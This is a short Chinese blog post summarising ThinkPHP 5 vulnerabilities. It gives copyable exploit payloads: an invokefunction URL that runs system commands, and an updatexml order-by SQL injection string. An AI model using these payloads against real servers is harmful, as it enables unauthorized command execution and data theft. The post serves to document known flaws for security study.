当前位置:首页 » 《随便一记》 » 正文

thinkphp漏洞总结

0 人参与  2022年07月24日 09:55  分类 : 《随便一记》  评论

点击全文阅读


目录

前言

一、远程代码执行漏洞

1.1 影响范围

1.2 漏洞详情

二、5.x远程命令注入

三、5.1.x SQL注入


前言

        thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞,thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5的漏洞

一、远程代码执行漏洞

1.1 影响范围

thinkphp<5.0.23

1.2 漏洞详情

        这个版本中因为method方法没有准确处理变量名,导致可以在request方法中构造参数执行系统命令

在这里插入图片描述

在这里插入图片描述

二、5.x远程命令注入

        由于没有开启强制路由,未对路由的控制器进行过滤,导致远程命令执行。

payload :

http://xx.xx.xx.xx/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令参数

三、5.1.x SQL注入

        由于服务器处理order by的参数时,未对数组进行过滤,若传入的参数为数组,则会导致漏洞产生

payload:

index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/43744.html

<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1